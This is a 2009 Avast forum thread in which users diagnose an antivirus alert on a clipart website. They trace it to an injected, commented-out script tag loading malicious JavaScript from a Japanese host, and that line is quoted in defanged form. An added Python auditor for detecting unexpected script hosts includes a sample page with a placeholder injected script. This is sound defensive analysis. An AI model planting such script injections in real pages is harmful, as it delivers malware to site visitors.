Author Topic: html script:inf alert  (Read 4947 times)

greytilIdye

  • Guest
html script:inf alert
« on: April 14, 2009, 04:07:14 PM »
I started getting this alert today on a site, pdclipart.org that has always worked fine previously.

I Googled script:inf and found several Avast forum posts relating to the issue.

On one post I noticed that Avast had blocked a net stat site.

I used the noscripts add-in in Firefox, and the only 2 scripts the blocked page wants to run are to:

statcounter.com

and

googlesyndication.com

Is either of these causing the problem?

Thanks for your time.

onlysomeone

  • Guest
Re: html script:inf alert
« Reply #1 on: April 14, 2009, 04:13:53 PM »
where do you get this alert?
on the main page or when going "deeper" into the site?

yours
onlysomeone

greytilIdye

  • Guest
Re: html script:inf alert
« Reply #2 on: April 14, 2009, 04:25:10 PM »
Thanks for the quick reply.

The main site (www.pdclipart.org) is fine, as is the image results page (http://www.pdclipart.org/thumbnails.php)

The alert comes when an image is double clicked (which would open it full size, rather than immediately download it.) and the site tries to go to: http://www.pdclipart.org/displayimage.php?album=search&cat=0&pos=1 where the part after ? simply identifies the position of the image in the thumbnail table.

It's odd, because NoScript doesn't report any added scripts trying to run at this point.

onlysomeone

  • Guest
Re: html script:inf alert
« Reply #3 on: April 14, 2009, 04:59:38 PM »
I did some research on this site and it really seems to be a serious and safe website, but I can't say if this site is really infected or if this is a false positive...
http://www.mywot.com/en/scorecard/www.pdclipart.org

This is the part of the resident Log (link disarmed):
Quote
hxxp://www.pdclipart.org/displayimage.php?album=143&pos=1 [L] HTML:Script-inf (0)

I'm sorry because I can't help you any further with this, but I'm sure someone else on this forum can!

yours
onlysomeone
« Last Edit: April 14, 2009, 05:01:33 PM by onlysomeone »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89386
  • No support PMs thanks
Re: html script:inf alert
« Reply #4 on: April 14, 2009, 05:26:40 PM »
Neither, the statcounter.com and googlesyndication.com scripts are the problem.

However I have stumbled around in there and not got a single alert. I tried to go to the thumbnails.php link you gave only to get an error, The selected album/file does not exist !

So I had to do a search to return some results and then click on one of them to get the alert.

Now I have had a look at the page code where the alert happens and I can only see one script tag which might possibly be causing this alert and it is one of the google scripts at the end of the page.

But, I'm not convinced it is a good detection, so I have submitted it for analysis.

« Last Edit: April 14, 2009, 05:47:03 PM by DavidR »
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.6.6121 (build 24.6.9241.848) UI 1.0.809/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

greytilIdye

  • Guest
Re: html script:inf alert
« Reply #5 on: April 14, 2009, 05:39:07 PM »
Thank you both for your prompt help.

It's interesting that it only happened today (yesterday was fine.)

Perhaps one of the new definitions is causing a false positive?

kubecj

  • Guest
Re: html script:inf alert
« Reply #6 on: April 14, 2009, 07:45:05 PM »

This is in the middle of the hXXp://www.pdclipart.org/displayimage.php?album=31&pos=7 page:

<!--CAPTION in DB.  It's the Description-->
<!-- <script src=hXXp://cgi35.plala.or.jp/BTO/data/entry/css.js></script><br />-->

And that stuff is malware without any doubt.
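
The check described in this thread, as an added example that is not part of any post: list every external script host in a page, including tags sitting inside HTML comments, and report hosts outside an expected set. The sample page and the host `injected.example` are constructed placeholders, and the allowlist is assumed from the two hosts NoScript listed earlier in the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script hosts the page is expected to use (the two NoScript listed in the thread).
EXPECTED_HOSTS = ("statcounter.com", "googlesyndication.com")

class ScriptAudit(HTMLParser):
    def __init__(self, in_comment=False):
        super().__init__()
        self.in_comment = in_comment
        self.findings = []  # (host, src, inside_comment)

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        host = (urlparse(src).hostname or "").lower() if src else ""
        if host:  # relative (same-origin) sources have no host and are skipped
            self.findings.append((host, src, self.in_comment))

    def handle_comment(self, data):
        # A commented-out tag never executes, so a script blocker has nothing
        # to report, but it is still in the stored content: parse it too.
        inner = ScriptAudit(in_comment=True)
        inner.feed(data)
        inner.close()
        self.findings.extend(inner.findings)

def is_expected(host):
    return any(host == h or host.endswith("." + h) for h in EXPECTED_HOSTS)

def audit(html):
    """Return (host, src, inside_comment) for every script host not expected."""
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    return [f for f in parser.findings if not is_expected(f[0])]

# Constructed sample page; injected.example is a placeholder host.
SAMPLE = """<html><body>
<script src="http://www.statcounter.com/counter.js"></script>
<!--CAPTION in DB.  It's the Description-->
<!-- <script src=http://injected.example/css.js></script><br />-->
<script src="http://pagead2.googlesyndication.com/show_ads.js"></script>
</body></html>"""

if __name__ == "__main__":
    for host, src, hidden in audit(SAMPLE):
        print(f"unexpected script host {host} ({src}), inside comment: {hidden}")
```

A hit with the inside-comment flag set points at stored content (here a caption field) that was written to by someone other than the site owner, even though nothing runs in the visitor's browser.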

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89386
  • No support PMs thanks
Re: html script:inf alert
« Reply #7 on: April 14, 2009, 08:42:49 PM »
I did see that and did a search on plala.or.jp and looked at WOT (two reports of malware) and norton safe web (nothing indicated). However checking on the cgi35 sub-domain returns more

I couldn't download the actual css.js as the network shield blocks plala.or.jp
Quote
14.04.2009  19:18:04  Network Shield: blocked access to malicious site cgi35.plala.or.jp/BTO/data/entry/css.js

Paused it and got the css.js and yes it is malware detected by the standard shield.

Quote
Sign of "VBS:Obfuscated-gen [trj]" has been found in "E:\Downloads\css.js"

A virustotal check shows the css.js as infected 8/40 from a previous upload 2 April 2009, http://www.virustotal.com/analisis/7e07501152f2b39e9d1c0fab5d231a17. Normally I would have it scanned again but I'm in a queue of 4004 ;D
« Last Edit: April 14, 2009, 08:51:28 PM by DavidR »

greytilIdye

  • Guest
Re: html script:inf alert
« Reply #8 on: April 16, 2009, 12:53:36 PM »
Thanks very much to all for your help.

I contacted PDClipart, and they have tracked down and removed the malicious code from their pages.

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: html script:inf alert
« Reply #9 on: April 16, 2009, 02:07:37 PM »
Quote
I contacted PDClipart, and they have tracked down and removed the malicious code from their pages.

A strong password to protect the site is a must-have policy.
The best things in life are free.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89386
  • No support PMs thanks
Re: html script:inf alert
« Reply #10 on: April 16, 2009, 04:00:05 PM »
Quote
Thanks very much to all for your help.

I contacted PDClipart, and they have tracked down and removed the malicious code from their pages.

You're welcome, hopefully now they can get on to how it got inserted and remove the vulnerability that allowed it.